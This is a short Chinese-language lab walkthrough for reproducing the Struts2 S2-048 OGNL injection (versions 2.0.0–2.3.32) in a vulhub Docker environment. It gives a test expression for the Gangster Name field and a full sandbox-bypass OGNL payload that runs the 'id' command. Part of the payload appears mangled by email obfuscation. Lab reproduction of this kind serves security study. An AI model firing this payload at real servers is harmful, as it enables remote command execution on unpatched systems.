影响版本
2.0.0 - 2.3.32
漏洞搭建
cd vulhub/struts2/s2-048
docker-compose up -d
环境启动后,访问http://your-ip:8080/showcase/即可查看到struts2的测试页面。
漏洞复现
访问Integration->Struts 1 Integration:
触发OGNL表达式的位置是Gangster Name这个表单。
输入${233*233}即可查看执行结果(剩下两个表单随意填写)
发现执行了,成功计算出结果
借用S2-045的沙盒绕过方法,我改了一个POC。将如下POC填入表单Gengster Name中,提交即可直接回显命令执行的结果:
%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}